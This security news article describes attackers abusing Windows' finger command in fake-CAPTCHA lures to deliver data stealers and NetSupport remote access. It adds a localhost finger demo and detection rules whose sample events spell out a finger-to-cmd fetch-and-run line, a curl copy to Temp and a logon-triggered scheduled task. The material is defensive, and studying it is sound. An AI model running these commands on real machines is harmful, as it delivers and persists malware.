
Redazione RHC : 26 November 2025 07:20
A nearly forgotten network command has returned to prominence after being spotted in new Windows infection chains. Long considered a relic of the early internet, the mechanism is now being used in attacks disguised as harmless checks and queries that victims are told to type into a Command Prompt window.
The finger command was designed to retrieve user information from Unix and Linux servers (the finger protocol, RFC 1288, runs over TCP port 79), and a client for it, finger.exe, still ships with Windows. It returned the account name, home directory and other basic details. Although the protocol is still supported, its use has largely disappeared. For attackers, this is an advantage: few would expect, or monitor, outbound network activity over such a channel.
Recent observations show that finger has begun to appear in ClickFix-style schemes, in which the commands to be executed on the device are fetched from a remote source. Researchers have long noted that the command behaves as a living-off-the-land binary (LOLBin): a finger server can return arbitrary text, so finger.exe can be used to download malicious content without any dedicated downloader.
In these new campaigns the method was developed further. MalwareHunterTeam provided an example batch file that queried a remote server via finger and piped the returned text directly into cmd for execution. The domains involved in this activity are no longer reachable, but researchers have found other examples of the same approach.
The first victims posted on Reddit: in one thread, a user described encountering a fake CAPTCHA that required them to open a Run window and enter a command to verify their identity. The entered string issued a finger request to another server and piped the output into the Windows command interpreter (cmd.exe).
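The exchange the batch file relies on, as an added example that is not part of the article and not MalwareHunterTeam's sample: a minimal finger responder and a client that behaves like `finger user@host`, run against each other on localhost. The query string, the ephemeral port and the body text are constructed for illustration; a real finger server listens on TCP port 79, and the body is whatever text the attacker wants cmd.exe to run.

```python
"""Minimal RFC 1288 (finger) exchange: a responder that serves an arbitrary
text body and a client that fetches it the way `finger user@host` does.

Added example, not code from the article or from the attackers. Host, port,
query string and payload text are constructed; the responder is bound to
127.0.0.1 on an ephemeral port so nothing leaves the machine. A real finger
server listens on TCP port 79.
"""
import socket
import threading

# Constructed "payload": in the campaigns described, this text is whatever the
# attacker wants cmd.exe to execute. Here it is harmless batch that only echoes.
DEMO_BODY = "@echo off\r\necho finger delivered this text\r\n"


def serve_one_query(listener, body):
    """Accept a single finger query on `listener` and answer it with `body`.

    Protocol: the client opens TCP, sends the query line terminated by CRLF,
    the server writes its response and closes the connection. Nothing about
    the "user" is validated; any string gets the same body back.
    """
    conn, _ = listener.accept()
    with conn:
        query = b""
        while not query.endswith(b"\r\n"):
            chunk = conn.recv(1024)
            if not chunk:
                break
            query += chunk
        conn.sendall(body.encode())
    return query.decode(errors="replace").rstrip("\r\n")


def finger_query(host, port, user, timeout=5.0):
    """Do what `finger user@host` does: send `user` CRLF, read until EOF."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.sendall(f"{user}\r\n".encode())
        out = b""
        while True:
            chunk = s.recv(4096)
            if not chunk:
                break
            out += chunk
    return out.decode(errors="replace")


def demo_exchange(user="anyuser", body=DEMO_BODY):
    """Run responder and client on localhost; return (query_seen, body_received)."""
    listener = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    listener.bind(("127.0.0.1", 0))  # ephemeral port, not 79
    listener.listen(1)
    port = listener.getsockname()[1]
    result = {}

    def server():
        result["query"] = serve_one_query(listener, body)

    t = threading.Thread(target=server)
    t.start()
    received = finger_query("127.0.0.1", port, user)
    t.join()
    listener.close()
    return result["query"], received


if __name__ == "__main__":
    q, text = demo_exchange()
    print(f"server saw query {q!r}")
    print("client received:\n" + text)
```

The point of the exchange is that the client side is a plain one-line TCP request with no content type, no integrity check and no size limit on the reply; `finger user@host | cmd` simply hands that reply to the shell.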
As a result, a temporary directory was created, the curl.exe utility that ships with Windows was copied into it under a random name, an archive disguised as a PDF was downloaded, and a set of Python files was extracted from it. The program was then launched with pythonw.exe (the windowless Python interpreter, so no console appears), a request was made to the attackers' server, and a fake "verification" message was displayed on screen.
The archive's contents pointed to an attempt at data theft. MalwareHunterTeam also found related activity: the finger command was used to download a nearly identical set of commands, but with additional checks. Before acting, the script looked for malware-analysis tools on the machine, from Process Explorer and Procmon to Wireshark, Fiddler and debuggers, and terminated if any were detected.
If no such tools were found, a new archive, again disguised as a PDF document, was downloaded and unpacked. This one contained the NetSupport Manager remote-administration package. After unpacking, a series of commands created a scheduled task that starts the remote-access client at the next logon.
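Detection logic for the chain described above, as an added example written for this page (not from the article, Red Hot Cyber or MalwareHunterTeam). The rules follow the behaviours the article lists: finger output piped into an interpreter, finger.exe spawned by a shell and talking to TCP port 79, curl.exe copied to a temporary directory, a search for analysis tools, pythonw.exe running from Temp, and a logon-triggered scheduled task. The event records, their Sysmon-like field names, every path and every hostname are constructed; two points are assumptions rather than facts from the article: that the analysis-tool check is done by enumerating processes (so a command line naming several such tools is flagged), and that the task's action is client32.exe, NetSupport's client binary.

```python
"""Rules for the finger-based ClickFix chain, run over constructed events.

Added example, not from the article or MalwareHunterTeam. Records are dicts
with Sysmon-style field names (Event ID 1: Image, ParentImage, CommandLine;
Event ID 3: DestinationIp, DestinationPort). All sample data is constructed.
"""
import re

# finger user@host ... | cmd   (or powershell)
FINGER_PIPE_TO_SHELL = re.compile(
    r"\bfinger(?:\.exe)?\s+\S+@\S+[^|]*\|\s*(?:cmd|powershell)", re.I)
# copy of the Windows-shipped curl.exe into a Temp directory
CURL_COPY_TO_TEMP = re.compile(r"\bcopy\b.*\\curl\.exe\b.*\\temp\\", re.I)
# logon-triggered scheduled task
SCHTASKS_ONLOGON = re.compile(
    r"\bschtasks(?:\.exe)?\b.*/create\b.*/sc\s+onlogon", re.I)
# Assumption: the analysis-tool check enumerates process names like these.
ANALYSIS_TOOLS = {"procexp", "procmon", "wireshark", "fiddler",
                  "x64dbg", "ollydbg", "windbg"}


def make_event(i, eid, **fields):
    d = {"id": i, "EventID": eid}
    d.update(fields)
    return d


# Constructed sample telemetry mirroring the article's chain; event 8 is benign.
SAMPLE_EVENTS = [
    make_event(1, 1, Image=r"C:\Windows\System32\cmd.exe",
               ParentImage=r"C:\Windows\explorer.exe",
               CommandLine=r"cmd /c finger user@finger.example | cmd"),
    make_event(2, 1, Image=r"C:\Windows\System32\finger.exe",
               ParentImage=r"C:\Windows\System32\cmd.exe",
               CommandLine=r"finger user@finger.example"),
    make_event(3, 3, Image=r"C:\Windows\System32\finger.exe",
               DestinationIp="203.0.113.10", DestinationPort=79),
    make_event(4, 1, Image=r"C:\Windows\System32\cmd.exe",
               ParentImage=r"C:\Windows\System32\cmd.exe",
               CommandLine=r"cmd /c copy C:\Windows\System32\curl.exe "
                           r"C:\Users\u\AppData\Local\Temp\x1\kz8f.exe"),
    make_event(5, 1, Image=r"C:\Windows\System32\cmd.exe",
               ParentImage=r"C:\Windows\System32\cmd.exe",
               CommandLine=r'cmd /c tasklist | findstr /i "procexp procmon '
                           r'wireshark fiddler x64dbg"'),
    make_event(6, 1, Image=r"C:\Users\u\AppData\Local\Temp\x1\py\pythonw.exe",
               ParentImage=r"C:\Windows\System32\cmd.exe",
               CommandLine=r"C:\Users\u\AppData\Local\Temp\x1\py\pythonw.exe "
                           r"C:\Users\u\AppData\Local\Temp\x1\main.py"),
    make_event(7, 1, Image=r"C:\Windows\System32\schtasks.exe",
               ParentImage=r"C:\Windows\System32\cmd.exe",
               CommandLine=r'schtasks /create /tn Updater /sc onlogon /tr '
                           r'"C:\Users\u\AppData\Local\Temp\x1\client32.exe"'),
    make_event(8, 1, Image=r"C:\Windows\System32\cmd.exe",
               ParentImage=r"C:\Windows\explorer.exe", CommandLine=r"cmd /c dir"),
]


def analyze(events):
    """Return (rule_name, event_id) findings for every rule an event trips."""
    findings = []
    for e in events:
        img = e.get("Image", "").lower()
        cmd = e.get("CommandLine", "")
        parent = e.get("ParentImage", "").lower()
        if e["EventID"] == 3:
            if img.endswith("\\finger.exe") and e.get("DestinationPort") == 79:
                findings.append(("finger_outbound_tcp79", e["id"]))
            continue
        if FINGER_PIPE_TO_SHELL.search(cmd):
            findings.append(("finger_output_piped_to_interpreter", e["id"]))
        if img.endswith("\\finger.exe") and parent.endswith(("\\cmd.exe", "\\powershell.exe")):
            findings.append(("finger_spawned_by_shell", e["id"]))
        if CURL_COPY_TO_TEMP.search(cmd):
            findings.append(("curl_copied_to_temp", e["id"]))
        if sum(1 for t in ANALYSIS_TOOLS if t in cmd.lower()) >= 2:
            findings.append(("analysis_tool_enumeration", e["id"]))
        if img.endswith("\\pythonw.exe") and "\\temp\\" in img:
            findings.append(("pythonw_from_temp", e["id"]))
        if SCHTASKS_ONLOGON.search(cmd) and "\\temp\\" in cmd.lower():
            findings.append(("scheduled_task_onlogon_from_temp", e["id"]))
    return findings


if __name__ == "__main__":
    for rule, eid in analyze(SAMPLE_EVENTS):
        print(f"event {eid}: {rule}")
```

The highest-signal rules are the first three: finger.exe has almost no legitimate use on a modern workstation, so any outbound TCP/79 connection or any finger invocation whose parent is a shell deserves a look on its own; the later rules describe this particular chain and are worth correlating rather than alerting on individually.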